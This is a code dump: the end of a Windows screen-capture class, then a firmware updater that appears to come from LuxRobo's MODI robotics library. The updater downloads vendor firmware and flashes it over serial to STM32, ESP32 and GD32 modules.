img = np.fromstring(signedIntsArray, dtype="uint8")
img.shape = (self.h, self.w, 4)
# free resources
dcObj.DeleteDC()
cDC.DeleteDC()
win32gui.ReleaseDC(self.hwnd, wDC)
win32gui.DeleteObject(dataBitMap.GetHandle())
# drop the alpha channel, or cv.matchTemplate() will throw an error like:
# error: (-215:Assertion failed) (depth == CV_8U || depth == CV_32F) && type == _templ.type()
# && _img.dims() <= 2 in function 'cv::matchTemplate'
img = img[..., :3]
# make image C_CONTIGUOUS to avoid errors that look like:
# File ... in draw_rectangles
# TypeError: an integer is required (got type tuple)
# see the discussion here:
# https://github.com/opencv/opencv/issues/14866#issuecomment-580207109
img = np.ascontiguousarray(img)
return img
# find the name of the window you're interested in.
# once you have it, update window_capture()
# https://stackoverflow.com/questions/55547940/how-to-get-a-list-of-the-name-of-every-open-window
@staticmethod
def list_window_names():
window_list = []
def winEnumHandler(hwnd, ctx):
if win32gui.IsWindowVisible(hwnd):
print(hex(hwnd), win32gui.GetWindowText(hwnd))
window_list.append(win32gui.GetWindowText(hwnd))
win32gui.EnumWindows(winEnumHandler, None)
return window_list
# translate a pixel position on a screenshot image to a pixel position on the screen.
# pos = (x, y)
# WARNING: if you move the window being captured after execution is started, this will
# return incorrect coordinates, because the window position is only calculated in
# the __init__ constructor.
def get_screen_position(self, pos):
return (pos[0] + self.offset_x, pos[1] + self.offset_y)
# threading methods
def start(self):
self.stopped = False
t = Thread(target=self.run)
t.start()
def stop(self):
self.stopped = True
def run(self):
# TODO: you can write your own time/iterations calculation to determine how fast this is
while not self.stopped:
# get an updated image of the game
screenshot = self.get_screenshot()
# lock the thread while updating the results
self.lock.acquire()
self.screenshot = screenshot
self.lock.release()
|
firmware_updater.py
|
import io
import sys
import time
import json
import serial
import zipfile
import threading as th
import urllib.request as ur
from os import path
from io import open
from base64 import b64encode, b64decode
from importlib import import_module as im
from urllib.error import URLError
from modi.module.module import Module
from modi.util.message_util import unpack_data, decode_message, parse_message
from modi.util.connection_util import list_modi_ports, is_on_pi
from modi.util.miscellaneous_util import get_module_type_from_uuid
class STM32FirmwareUpdater:
"""STM32 Firmware Updater: Updates a firmware of given module"""
NO_ERROR = 0
UPDATE_READY = 1
WRITE_FAIL = 2
VERIFY_FAIL = 3
CRC_ERROR = 4
CRC_COMPLETE = 5
ERASE_ERROR = 6
ERASE_COMPLETE = 7
def __init__(
self, is_os_update=True, target_ids=(0xFFF, ), conn_type='ser'
):
self.conn_type = conn_type
self.update_network_base = False
self.__conn = self.__open_conn()
self.__conn.open_conn()
th.Thread(target=self.__read_conn, daemon=True).start()
self.__target_ids = target_ids
self.response_flag = False
self.response_error_flag = False
self.response_error_count = 0
self.__running = True
self.__is_os_update = is_os_update
self.update_event = th.Event()
self.update_in_progress = False
self.modules_to_update = []
self.modules_updated = []
self.network_id = None
self.ui = None
self.request_network_id()
def __del__(self):
try:
self.close()
except Exception as e:
print('Magic del is called with an exception:', e)
def set_ui(self, ui):
self.ui = ui
def request_network_id(self):
self.__conn.send_nowait(
parse_message(0x28, 0xFFF, 0xFFF, (0xFF, 0x0F))
)
def __assign_network_id(self, sid, data):
module_uuid = unpack_data(data, (6, 1))[0]
module_type = get_module_type_from_uuid(module_uuid)
if module_type == 'network':
self.network_id = sid
def update_module_firmware(self, update_network_base=False):
if update_network_base:
self.update_network_base = True
# Retrieve the network id only and update it accordingly
timeout, delay = 3, 0.1
while not self.network_id:
if timeout <= 0:
if not self.update_in_progress:
print(
'Could not retrieve network id, '
'broadcast id will be used instead.'
)
self.network_id = 0xFFF
break
self.request_network_id()
timeout -= delay
time.sleep(delay)
"""
If network id could not be retrieved, it's probably the case that
the network is already in the update progress. As such, we skip to
request to update the base firmware.
"""
if self.network_id != 0xFFF:
print(
f'Sending a request to update firmware of network '
f'({self.network_id})'
)
if not self.update_in_progress:
self.request_to_update_firmware(
self.network_id, is_network=True
)
else:
self.reset_state()
for target in self.__target_ids:
self.request_to_update_firmware(target)
self.update_event.wait()
print("Module firmwares have been updated!")
self.close()
def close(self):
self.__running = False
time.sleep(0.5)
self.__conn.close_conn()
def __open_conn(self):
if is_on_pi() and self.conn_type == 'can':
return im('modi.task.can_task').CanTask()
else:
return im('modi.task.ser_task').SerTask()
def _reconnect_serial_connection(self, modi_num):
while True:
time.sleep(0.1)
disconnect = False
if not list_modi_ports():
disconnect = True
if disconnect:
if modi_num == list_modi_ports():
self.__reinitialize_serial_connection()
break
def reinitialize_serial_connection(self, mode=1):
if self.ui and self.update_network_base and mode == 2:
modi_num = len(list_modi_ports())
if self.ui.is_english:
self.ui.update_network_stm32.setText(
"Reconnect network module and "
"click the button again please."
)
else:
self.ui.update_network_stm32.setText(
"네트워크 모듈을 재연결 후 버튼을 다시 눌러주십시오."
)
th.Thread(
target=self._reconnect_serial_connection,
args=(modi_num,),
daemon=True
).start()
else:
self.__reinitialize_serial_connection()
def __reinitialize_serial_connection(self):
print('Temporally disconnecting the serial connection...')
self.close()
time.sleep(2)
print('Re-init serial connection for the update, in 2 seconds...')
self.__conn = self.__open_conn()
self.__conn.open_conn()
self.__running = True
th.Thread(target=self.__read_conn, daemon=True).start()
def reset_state(self, update_in_progress: bool = False) -> None:
self.response_flag = False
self.response_error_flag = False
self.response_error_count = 0
self.update_in_progress = False
if not update_in_progress:
print('Make sure you have connected module(s) to update')
print("Resetting firmware updater's state")
self.modules_to_update = []
self.modules_updated = []
def request_to_update_firmware(self, module_id, is_network=False) -> None:
# Remove firmware of MODI modules (Removes EndFlash)
if is_network:
firmware_update_message = self.__set_network_state(
module_id, 4, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_message)
self.reinitialize_serial_connection(2)
else:
firmware_update_message = self.__set_module_state(
module_id, Module.UPDATE_FIRMWARE, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_message)
print('Firmware update has been requested')
def check_to_update_firmware(self, module_id: int) -> None:
firmware_update_ready_message = self.__set_module_state(
module_id, Module.UPDATE_FIRMWARE_READY, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_ready_message)
def add_to_waitlist(self, module_id: int, module_type: str) -> None:
# Check if input module already exist in the list
for curr_module_id, curr_module_type in self.modules_to_update:
if module_id == curr_module_id:
return
# Check if module is already updated
for curr_module_id, curr_module_type in self.modules_updated:
if module_id == curr_module_id:
return
print(f"Adding {module_type} ({module_id}) to waiting list..."
f"{' ' * 60}")
# Add the module to the waiting list
module_elem = module_id, module_type
self.modules_to_update.append(module_elem)
def update_module(self, module_id: int, module_type: str) -> None:
if self.update_in_progress:
return
self.update_in_progress = True
updater_thread = th.Thread(
target=self.__update_firmware, args=(module_id, module_type)
)
updater_thread.daemon = True
updater_thread.start()
def update_response(self, response: bool,
is_error_response: bool = False) -> None:
if not is_error_response:
self.response_flag = response
else:
self.response_error_flag = response
def __update_firmware(self, module_id: int, module_type: str) -> None:
self.update_in_progress = True
self.modules_updated.append((module_id, module_type))
# Init base root_path, utilizing local binary files
root_path = (
path.join(
path.dirname(__file__),
'..', 'assets', 'firmware', 'stm32'
)
)
if self.__is_os_update:
if self.ui:
if self.update_network_base:
root_path = (
'https://download.luxrobo.com/modi-network-os'
)
zip_path = root_path + '/network.zip'
bin_path = 'network.bin'
else:
root_path = (
'https://download.luxrobo.com/modi-skeleton-mobile'
)
zip_path = root_path + '/skeleton.zip'
bin_path = (
path.join(f'skeleton/{module_type.lower()}.bin')
if module_type != 'env' else
path.join('skeleton/environment.bin')
)
try:
with ur.urlopen(zip_path, timeout=5) as conn:
download_response = conn.read()
except URLError:
raise URLError(
"Failed to download firmware. Check your internet."
)
zip_content = zipfile.ZipFile(
io.BytesIO(download_response), 'r'
)
bin_buffer = zip_content.read(bin_path)
else:
bin_path = path.join(root_path, f"{module_type.lower()}.bin")
with open(bin_path, 'rb') as bin_file:
bin_buffer = bin_file.read()
# Init metadata of the bytes loaded
page_size = 0x800
flash_memory_addr = 0x08000000
bin_size = sys.getsizeof(bin_buffer)
bin_begin = 0x9000 if not self.update_network_base else page_size
bin_end = bin_size - ((bin_size - bin_begin) % page_size)
page_offset = 0 if not self.update_network_base else 0x8800
for page_begin in range(bin_begin, bin_end + 1, page_size):
progress = 100 * page_begin // bin_end
if self.ui:
if self.update_network_base:
if self.ui.is_english:
self.ui.update_network_stm32.setText(
f"Network STM32 update is in progress. "
f"({progress}%)"
)
else:
self.ui.update_network_stm32.setText(
f"네트워크 모듈 초기화가 진행중입니다. "
f"({progress}%)"
)
else:
if self.ui.is_english:
self.ui.update_stm32_modules.setText(
f"STM32 modules update is in progress. "
f"({progress}%)"
)
else:
self.ui.update_stm32_modules.setText(
f"모듈 초기화가 진행중입니다. ({progress}%)"
)
print(
f"\rUpdating {module_type} ({module_id}) "
f"{self.__progress_bar(page_begin, bin_end)} "
f"{progress}%", end=''
)
page_end = page_begin + page_size
curr_page = bin_buffer[page_begin:page_end]
# Skip current page if empty
if not sum(curr_page):
continue
# Erase page (send erase request and receive its response)
erase_page_success = self.send_firmware_command(
oper_type="erase", module_id=module_id, crc_val=0,
dest_addr=flash_memory_addr,
page_addr=page_begin + page_offset
)
if not erase_page_success:
page_begin -= page_size
continue
# Copy current page data to the module's memory
checksum = 0
for curr_ptr in range(0, page_size, 8):
if page_begin + curr_ptr >= bin_size:
break
curr_data = curr_page[curr_ptr:curr_ptr + 8]
checksum = self.send_firmware_data(
module_id,
seq_num=curr_ptr // 8,
bin_data=curr_data,
crc_val=checksum
)
self.__delay(0.002)
# CRC on current page (send CRC request / receive CRC response)
crc_page_success = self.send_firmware_command(
oper_type="crc", module_id=module_id, crc_val=checksum,
dest_addr=flash_memory_addr,
page_addr=page_begin + page_offset
)
if not crc_page_success:
page_begin -= page_size
time.sleep(0.01)
print(
f"\rUpdating {module_type} ({module_id}) "
f"{self.__progress_bar(1, 1)} 100%"
)
# Get version info from version_path, using appropriate methods
version_info, version_file = None, 'version.txt'
if self.ui:
version_path = root_path + '/' + version_file
for line in ur.urlopen(version_path, timeout=5):
version_info = line.decode('utf-8').lstrip('v')
else:
if self.update_network_base:
version_file = 'base_' + version_file
version_path = root_path + '/' + version_file
with open(version_path) as version_file:
version_info = version_file.readline().lstrip('v').rstrip('\n')
version_digits = [int(digit) for digit in version_info.split('.')]
""" Version number is formed by concatenating all three version bits
e.g. 2.2.4 -> 010 00010 00000100 -> 0100 0010 0000 0100
"""
version = (
version_digits[0] << 13 |
version_digits[1] << 8 |
version_digits[2]
)
# Set end-flash data to be sent at the end of the firmware update
end_flash_data = bytearray(8)
end_flash_data[0] = 0xAA
end_flash_data[6] = version & 0xFF
end_flash_data[7] = (version >> 8) & 0xFF
self.send_end_flash_data(module_type, module_id, end_flash_data)
print(
f'Version info (v{version_info}) has been written to its firmware!'
)
# Firmware update flag down, resetting used flags
print(f'Firmware update is done for {module_type} ({module_id})')
self.reset_state(update_in_progress=True)
if self.modules_to_update:
print("Processing the next module to update the firmware..")
next_module_id, next_module_type = self.modules_to_update.pop(0)
self.__update_firmware(next_module_id, next_module_type)
else:
# Reboot all connected modules
reboot_message = self.__set_module_state(
0xFFF, Module.REBOOT, Module.PNP_OFF
)
self.__conn.send_nowait(reboot_message)
print("Reboot message has been sent to all connected modules")
self.reset_state()
if self.update_network_base:
self.reinitialize_serial_connection(1)
time.sleep(0.5)
time.sleep(1)
self.update_in_progress = False
self.update_event.set()
if self.ui:
if self.update_network_base:
self.ui.update_stm32_modules.setStyleSheet(
f'border-image: url({self.ui.active_path})'
)
self.ui.update_stm32_modules.setEnabled(True)
if self.ui.is_english:
self.ui.update_network_stm32.setText(
"Update Network STM32"
)
else:
self.ui.update_network_stm32.setText(
"네트워크 모듈 초기화"
)
else:
self.ui.update_network_stm32.setStyleSheet(
f'border-image: url({self.ui.active_path})'
)
self.ui.update_network_stm32.setEnabled(True)
if self.ui.is_english:
self.ui.update_stm32_modules.setText(
"Update STM32 Modules."
)
else:
self.ui.update_stm32_modules.setText(
"모듈 초기화"
)
self.ui.update_network_esp32.setStyleSheet(
f'border-image: url({self.ui.active_path})'
)
self.ui.update_network_esp32.setEnabled(True)
@staticmethod
def __delay(span):
init_time = time.perf_counter()
while time.perf_counter() - init_time < span:
pass
return
@staticmethod
def __set_network_state(destination_id: int, module_state: int,
pnp_state: int) -> str:
message = dict()
message["c"] = 0xA4
message["s"] = 0
message["d"] = destination_id
state_bytes = bytearray(2)
state_bytes[0] = module_state
state_bytes[1] = pnp_state
message["b"] = b64encode(bytes(state_bytes)).decode("utf-8")
message["l"] = 2
return json.dumps(message, separators=(",", ":"))
@staticmethod
def __set_module_state(destination_id: int, module_state: int,
pnp_state: int) -> str:
message = dict()
message["c"] = 0x09
message["s"] = 0
message["d"] = destination_id
state_bytes = bytearray(2)
state_bytes[0] = module_state
state_bytes[1] = pnp_state
message["b"] = b64encode(bytes(state_bytes)).decode("utf-8")
message["l"] = 2
return json.dumps(message, separators=(",", ":"))
# TODO: Use retry decorator here
def send_end_flash_data(self, module_type: str, module_id: int,
end_flash_data: bytearray) -> None:
# Write end-flash data until success
end_flash_success = False
while not end_flash_success:
# Erase page (send erase request and receive erase response)
erase_page_success = self.send_firmware_command(
oper_type="erase", module_id=module_id, crc_val=0,
dest_addr=0x0801F800
)
# TODO: Remove magic number of dest_addr above, try using flash_mem
if not erase_page_success:
continue
# Send data
checksum = self.send_firmware_data(
module_id, seq_num=0, bin_data=end_flash_data, crc_val=0
)
# CRC on current page (send CRC request and receive CRC response)
crc_page_success = self.send_firmware_command(
oper_type="crc", module_id=module_id, crc_val=checksum,
dest_addr=0x0801F800
)
if not crc_page_success:
continue
end_flash_success = True
# print(f"End flash is written for {module_type} ({module_id})")
def get_firmware_command(self, module_id: int, rot_stype: int,
rot_scmd: int, crc32: int, page_addr: int) -> str:
message = dict()
message["c"] = 0x0D
""" SID is 12-bits length in MODI CAN.
To fully utilize its capacity, we split 12-bits into 4 and 8 bits.
First 4 bits include rot_scmd information.
And the remaining bits represent rot_stype.
"""
message["s"] = (rot_scmd << 8) | rot_stype
message["d"] = module_id
""" The firmware command data to be sent is 8-bytes length.
Where the first 4 bytes consist of CRC-32 information.
Last 4 bytes represent page address information.
"""
crc32_and_page_addr_data = bytearray(8)
for i in range(4):
crc32_and_page_addr_data[i] = crc32 & 0xFF
crc32 >>= 8
crc32_and_page_addr_data[4 + i] = page_addr & 0xFF
page_addr >>= 8
message["b"] = b64encode(
bytes(crc32_and_page_addr_data)
).decode("utf-8")
message["l"] = 8
return json.dumps(message, separators=(",", ":"))
def get_firmware_data(self, module_id: int, seq_num: int,
bin_data: bytes) -> str:
message = dict()
message["c"] = 0x0B
message["s"] = seq_num
message["d"] = module_id
message["b"] = b64encode(bytes(bin_data)).decode("utf-8")
message["l"] = 8
return json.dumps(message, separators=(",", ":"))
def calc_crc32(self, data: bytes, crc: int) -> int:
crc ^= int.from_bytes(data, byteorder='little', signed=False)
for _ in range(32):
if crc & (1 << 31) != 0:
crc = (crc << 1) ^ 0x4C11DB7
else:
crc <<= 1
crc &= 0xFFFFFFFF
return crc
def calc_crc64(self, data: bytes, checksum: int) -> int:
checksum = self.calc_crc32(data[:4], checksum)
checksum = self.calc_crc32(data[4:], checksum)
return checksum
def send_firmware_command(self, oper_type: str, module_id: int,
crc_val: int, dest_addr: int,
page_addr: int = 0) -> bool:
rot_scmd = 2 if oper_type == "erase" else 1
# Send firmware command request
request_message = self.get_firmware_command(
module_id, 1, rot_scmd, crc_val, page_addr=dest_addr + page_addr
)
self.__conn.send_nowait(request_message)
return self.receive_command_response()
def receive_command_response(self, response_delay: float = 0.001,
response_timeout: float = 5,
max_response_error_count: int = 75) -> bool:
# Receive firmware command response
response_wait_time = 0
while not self.response_flag:
# Calculate timeout at each iteration
time.sleep(response_delay)
response_wait_time += response_delay
# If timed-out
if response_wait_time > response_timeout:
raise Exception("Response timed-out")
# If error is raised
if self.response_error_flag:
self.response_error_count += 1
if self.response_error_count > max_response_error_count:
raise Exception("Response Errored")
self.response_error_flag = False
return False
self.response_flag = False
return True
def send_firmware_data(self, module_id: int, seq_num: int, bin_data: bytes,
crc_val: int) -> int:
# Send firmware data
data_message = self.get_firmware_data(
module_id, seq_num=seq_num, bin_data=bin_data
)
self.__conn.send_nowait(data_message)
# Calculate crc32 checksum twice
checksum = self.calc_crc64(data=bin_data, checksum=crc_val)
return checksum
def __progress_bar(self, current: int, total: int) -> str:
curr_bar = 50 * current // total
rest_bar = 50 - curr_bar
return f"[{'=' * curr_bar}>{'.' * rest_bar}]"
def __read_conn(self):
while True:
self.__handle_message()
time.sleep(0.001)
if not self.__running:
break
def __handle_message(self):
msg = self.__conn.recv()
if not msg:
return
try:
ins, sid, did, data, length = decode_message(msg)
except json.JSONDecodeError:
return
command = {
0x05: self.__assign_network_id,
0x0A: self.__update_warning,
0x0C: self.__update_firmware_state
}.get(ins)
if command:
command(sid, data)
def __update_firmware_state(self, sid: int, data: str):
message_decoded = unpack_data(data, (4, 1))
stream_state = message_decoded[1]
if stream_state == self.CRC_ERROR:
self.update_response(response=True, is_error_response=True)
elif stream_state == self.CRC_COMPLETE:
self.update_response(response=True)
elif stream_state == self.ERASE_ERROR:
self.update_response(response=True, is_error_response=True)
elif stream_state == self.ERASE_COMPLETE:
self.update_response(response=True)
def __update_warning(self, sid: int, data: str) -> None:
module_uuid = unpack_data(data, (6, 1))[0]
warning_type = unpack_data(data, (6, 1))[1]
# If warning shows current module works fine, return immediately
if not warning_type:
return
module_id = sid
module_type = get_module_type_from_uuid(module_uuid)
if warning_type == 1:
self.check_to_update_firmware(module_id)
elif warning_type == 2:
# Note that more than one warning type 2 message can be received
if self.update_in_progress:
self.add_to_waitlist(module_id, module_type)
else:
self.update_module(module_id, module_type)
def retry(exception_to_catch):
def decorator(func):
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except exception_to_catch:
return wrapper(*args, **kwargs)
return wrapper
return decorator
class ESP32FirmwareUpdater(serial.Serial):
DEVICE_READY = 0x2B
DEVICE_SYNC = 0x08
SPI_ATTACH_REQ = 0xD
SPI_FLASH_SET = 0xB
ESP_FLASH_BEGIN = 0x02
ESP_FLASH_DATA = 0x03
ESP_FLASH_END = 0x04
ESP_FLASH_BLOCK = 0x200
ESP_FLASH_CHUNK = 0x4000
ESP_CHECKSUM_MAGIC = 0xEF
def __init__(self):
modi_ports = list_modi_ports()
if not modi_ports:
raise serial.SerialException("No MODI port is connected")
super().__init__(modi_ports[0].device, timeout=0.1, baudrate=921600)
print(f"Connecting to MODI network module at {modi_ports[0].device}")
self.__address = [0x1000, 0x8000, 0XD000, 0x10000, 0xD0000]
self.file_path = [
'bootloader.bin', 'partitions.bin', 'ota_data_initial.bin',
'modi_ota_factory.bin', 'esp32.bin'
]
self.id = None
self.version = None
self.__version_to_update = None
self.update_in_progress = False
self.ui = None
def set_ui(self, ui):
self.ui = ui
def update_firmware(self, force=False):
self.update_in_progress = True
self.__boot_to_app()
self.__version_to_update = self.__get_latest_version()
self.id = self.__get_esp_id()
self.version = self.__get_esp_version()
if self.version and self.version == self.__version_to_update:
if not force and not self.ui:
response = input(
f"ESP version already up to date (v{self.version})."
f" Do you still want to proceed? [y/n]: ")
if 'y' not in response:
return
print(f"Updating v{self.version} to v{self.__version_to_update}")
firmware_buffer = self.__compose_binary_firmware()
self.__device_ready()
self.__device_sync()
self.__flash_attach()
self.__set_flash_param()
manager = None
self.__write_binary_firmware(firmware_buffer, manager)
print("Booting to application...")
self.__wait_for_json()
self.__boot_to_app()
time.sleep(1)
self.__set_esp_version(self.__version_to_update)
print("ESP firmware update is complete!!")
self.update_in_progress = False
time.sleep(1)
self.flushInput()
self.flushOutput()
self.close()
if self.ui:
self.ui.update_stm32_modules.setStyleSheet(
f'border-image: url({self.ui.active_path})'
)
self.ui.update_stm32_modules.setEnabled(True)
self.ui.update_network_stm32.setStyleSheet(
f'border-image: url({self.ui.active_path})'
)
self.ui.update_network_stm32.setEnabled(True)
if self.ui.is_english:
self.ui.update_network_esp32.setText(
"Update Network ESP32"
)
else:
self.ui.update_network_esp32.setText(
"네트워크 모듈 업데이트"
)
def __device_ready(self):
print("Redirecting connection to esp device...")
self.write(b'{"c":43,"s":0,"d":4095,"b":"AA==","l":1}')
def __device_sync(self):
print("Syncing the esp device...")
sync_pkt = self.__parse_pkt([
0x0, self.DEVICE_SYNC, 0x24, 0, 0, 0, 0, 0, 0x7, 0x7, 0x12, 0x20
] + 32 * [0x55])
self.__send_pkt(sync_pkt, timeout=10, continuous=True)
print("Sync Complete")
def __flash_attach(self):
print("Attaching flash to esp device..")
attach_pkt = self.__parse_pkt([
0x0, self.SPI_ATTACH_REQ, 0x8
] + 13 * [0])
self.__send_pkt(attach_pkt, timeout=10)
print("Flash attach Complete")
def __set_flash_param(self):
print("Setting esp flash parameter...")
param_data = [0] * 32
fl_id, total_size, block_size, sector_size, page_size, status_mask = (
0, 2 * 1024 * 1024, 64 * 1024, 4 * 1024, 256, 0xFFFF
)
param_data[1] = self.SPI_FLASH_SET
param_data[2] = 0x18
param_data[8:12] = int.to_bytes(fl_id, length=4, byteorder='little')
param_data[12:16] = int.to_bytes(
total_size, length=4, byteorder='little'
)
param_data[16:20] = int.to_bytes(
block_size, length=4, byteorder='little'
)
param_data[20:24] = int.to_bytes(
sector_size, length=4, byteorder='little'
)
param_data[24:28] = int.to_bytes(
page_size, length=4, byteorder='little'
)
param_data[28:32] = int.to_bytes(
status_mask, length=4, byteorder='little'
)
param_pkt = self.__parse_pkt(param_data)
self.__send_pkt(param_pkt, timeout=10)
print("Parameter set complete")
@staticmethod
def __parse_pkt(data):
pkt = bytes(data)
pkt = pkt.replace(b'\xdb', b'\xdb\xdd').replace(b'\xc0', b'\xdb\xdc')
pkt = b'\xc0' + pkt + b'\xc0'
return pkt
@retry(Exception)
def __send_pkt(self, pkt, wait=True, timeout=None, continuous=False):
self.write(pkt)
self.reset_input_buffer()
if wait:
cmd = bytearray(pkt)[2]
init_time = time.time()
while not timeout or time.time() - init_time < timeout:
if continuous:
time.sleep(0.1)
else:
time.sleep(0.01)
recv_pkt = self.__read_slip()
if not recv_pkt:
if continuous:
self.__send_pkt(pkt, wait=False)
continue
recv_cmd = bytearray(recv_pkt)[2]
if cmd == recv_cmd:
if bytearray(recv_pkt)[1] != 0x01:
raise Exception
return True
elif continuous:
self.__send_pkt(pkt, wait=False)
print("Sending Again...")
raise Exception("Timeout Expired!")
def __read_slip(self):
slip_pkt = b''
while slip_pkt != b'\xc0':
slip_pkt = self.read()
if slip_pkt == b'':
return b''
slip_pkt += self.read_until(b'\xc0')
return slip_pkt
def __read_json(self):
json_pkt = b''
while json_pkt != b'{':
json_pkt = self.read()
if json_pkt == b'':
return ''
json_pkt += self.read_until(b'}')
return json_pkt
def __wait_for_json(self):
json_msg = self.__read_json()
while not json_msg:
json_msg = self.__read_json()
time.sleep(0.01)
return json_msg
def __get_esp_id(self):
json_msg = json.loads(self.__wait_for_json())
while json_msg['c'] != 0:
json_msg = json.loads(self.__wait_for_json())
return json_msg['s']
def __get_esp_version(self):
get_version_pkt = b'{"c":160,"s":25,"d":4095,"b":"AAAAAAAAAA==","l":8}'
self.write(get_version_pkt)
json_msg = json.loads(self.__wait_for_json())
init_time = time.time()
while json_msg['c'] != 0xA1:
self.write(get_version_pkt)
json_msg = json.loads(self.__wait_for_json())
if time.time() - init_time > 1:
return None
ver = b64decode(json_msg['b']).lstrip(b'\x00')
return ver.decode('ascii')
def __set_esp_version(self, version_text: str):
print(f"Writing version info (v{version_text})")
version_byte = version_text.encode('ascii')
version_byte = b'\x00' * (8 - len(version_byte)) + version_byte
version_text = b64encode(version_byte).decode('utf8')
version_msg = '{' + f'"c":160,"s":24,"d":4095,' \
f'"b":"{version_text}","l":8' + '}'
version_msg_enc = version_msg.encode('utf8')
self.write(version_msg_enc)
while json.loads(self.__wait_for_json())['c'] != 0xA1:
time.sleep(0.5)
self.__boot_to_app()
self.write(version_msg.encode('utf8'))
print("The version info has been set!!")
def __compose_binary_firmware(self):
binary_firmware = b''
for i, bin_path in enumerate(self.file_path):
if self.ui:
if i == 2:
root_path = path.join(
path.dirname(__file__),
'..', 'assets', 'firmware', 'esp32'
)
elif i == 3:
root_path = (
'https://download.luxrobo.com/modi-ota-firmware/'
'ota.zip'
)
else:
root_path = (
'https://download.luxrobo.com/modi-esp32-firmware/'
'esp.zip'
)
if i != 2:
try:
with ur.urlopen(root_path, timeout=5) as conn:
download_response = conn.read()
except URLError:
raise URLError(
'Failed to download firmware. Check your internet.'
)
zip_content = zipfile.ZipFile(
io.BytesIO(download_response), 'r'
)
bin_data = zip_content.read(bin_path)
elif i == 2:
firmware_path = path.join(root_path, bin_path)
if self.ui and self.ui.installation:
firmware_path = path.dirname(__file__).replace(
'util', bin_path
)
with open(firmware_path, 'rb') as bin_file:
bin_data = bin_file.read()
else:
root_path = path.join(
path.dirname(__file__),
'..', 'assets', 'firmware', 'esp32'
)
firmware_path = path.join(root_path, bin_path)
with open(firmware_path, 'rb') as bin_file:
bin_data = bin_file.read()
binary_firmware += bin_data
if i < len(self.__address) - 1:
binary_firmware += b'\xFF' * (
self.__address[i + 1] - self.__address[i] - len(bin_data)
)
return binary_firmware
def __get_latest_version(self):
if self.ui:
version_path = (
'https://download.luxrobo.com/modi-esp32-firmware/version.txt'
)
version_info = None
for line in ur.urlopen(version_path, timeout=5):
version_info = line.decode('utf-8').lstrip('v').rstrip('\n')
else:
root_path = path.join(
path.dirname(__file__),
'..', 'assets', 'firmware', 'esp32'
)
version_path = path.join(root_path, 'esp_version.txt')
with open(version_path, 'r') as version_file:
version_info = version_file.readline().lstrip('v').rstrip('\n')
return version_info
def __erase_chunk(self, size, offset):
num_blocks = size // self.ESP_FLASH_BLOCK + 1
erase_data = [0] * 24
erase_data[1] = self.ESP_FLASH_BEGIN
erase_data[2] = 0x10
erase_data[8:12] = int.to_bytes(size, length=4, byteorder='little')
erase_data[12:16] = int.to_bytes(
num_blocks, length=4, byteorder='little'
)
erase_data[16:20] = int.to_bytes(
self.ESP_FLASH_BLOCK, length=4, byteorder='little'
)
erase_data[20:24] = int.to_bytes(
offset, length=4, byteorder='little'
)
erase_pkt = self.__parse_pkt(erase_data)
self.__send_pkt(erase_pkt, timeout=10)
def __write_flash_block(self, data, seq_block):
size = len(data)
block_data = [0] * (size + 24)
checksum = self.ESP_CHECKSUM_MAGIC
block_data[1] = self.ESP_FLASH_DATA
block_data[2:4] = int.to_bytes(size + 16, length=2, byteorder='little')
block_data[8:12] = int.to_bytes(size, length=4, byteorder='little')
block_data[12:16] = int.to_bytes(
seq_block, length=4, byteorder='little'
)
for i in range(size):
block_data[24 + i] = data[i]
checksum ^= (0xFF & data[i])
block_data[4:8] = int.to_bytes(checksum, length=4, byteorder='little')
block_pkt = self.__parse_pkt(block_data)
self.__send_pkt(block_pkt)
def __write_binary_firmware(self, binary_firmware: bytes, manager):
chunk_queue = []
num_blocks = len(binary_firmware) // self.ESP_FLASH_BLOCK + 1
while binary_firmware:
if self.ESP_FLASH_CHUNK < len(binary_firmware):
chunk_queue.append(binary_firmware[:self.ESP_FLASH_CHUNK])
binary_firmware = binary_firmware[self.ESP_FLASH_CHUNK:]
else:
chunk_queue.append(binary_firmware[:])
binary_firmware = b''
blocks_downloaded = 0
print("Start uploading firmware data...")
for seq, chunk in enumerate(chunk_queue):
self.__erase_chunk(
len(chunk), self.__address[0] + seq * self.ESP_FLASH_CHUNK
)
blocks_downloaded += self.__write_chunk(
chunk, blocks_downloaded, num_blocks, manager
)
if manager:
manager.quit()
if self.ui:
if self.ui.is_english:
self.ui.update_network_esp32.setText(
"Network ESP32 update is in progress. (100%)"
)
else:
self.ui.update_network_esp32.setText(
"네트워크 모듈 업데이트가 진행중입니다. (100%)"
)
print(f"\r{self.__progress_bar(1, 1)}")
print("Firmware Upload Complete")
def __write_chunk(self, chunk, curr_seq, total_seq, manager):
block_queue = []
while chunk:
if self.ESP_FLASH_BLOCK < len(chunk):
block_queue.append(chunk[:self.ESP_FLASH_BLOCK])
chunk = chunk[self.ESP_FLASH_BLOCK:]
else:
block_queue.append(chunk[:])
chunk = b''
for seq, block in enumerate(block_queue):
if manager:
manager.status = self.__progress_bar(curr_seq + seq, total_seq)
if self.ui:
if self.ui.is_english:
self.ui.update_network_esp32.setText(
f"Network ESP32 update is in progress. "
f"({int((curr_seq+seq)/total_seq*100)}%)"
)
else:
self.ui.update_network_esp32.setText(
f"네트워크 모듈 업데이트가 진행중입니다. "
f"({int((curr_seq+seq)/total_seq*100)}%)"
)
print(
f'\r{self.__progress_bar(curr_seq + seq, total_seq)}', end=''
)
self.__write_flash_block(block, seq)
return len(block_queue)
def __boot_to_app(self):
self.write(b'{"c":160,"s":0,"d":174,"b":"AAAAAAAAAA==","l":8}')
@staticmethod
def __progress_bar(current: int, total: int) -> str:
curr_bar = 70 * current // total
rest_bar = 70 - curr_bar
return f"Firmware Upload: [{'=' * curr_bar}>{'.' * rest_bar}] " \
f"{100 * current / total:3.2f}%"
class GD32FirmwareUpdater:
"""GD32 Firmware Updater: Updates a firmware of given MODI2 module"""
NO_ERROR = 0
UPDATE_READY = 1
WRITE_FAIL = 2
VERIFY_FAIL = 3
CRC_ERROR = 4
CRC_COMPLETE = 5
ERASE_ERROR = 6
ERASE_COMPLETE = 7
def __init__(
self, is_os_update=True, target_ids=(0xFFF, ), conn_type='ser'
):
self.conn_type = conn_type
self.update_network_base = False
self.__conn = self.__open_conn()
self.__conn.open_conn()
th.Thread(target=self.__read_conn, daemon=True).start()
self.__target_ids = target_ids
self.response_flag = False
self.response_error_flag = False
self.response_error_count = 0
self.__running = True
self.__is_os_update = is_os_update
self.update_event = th.Event()
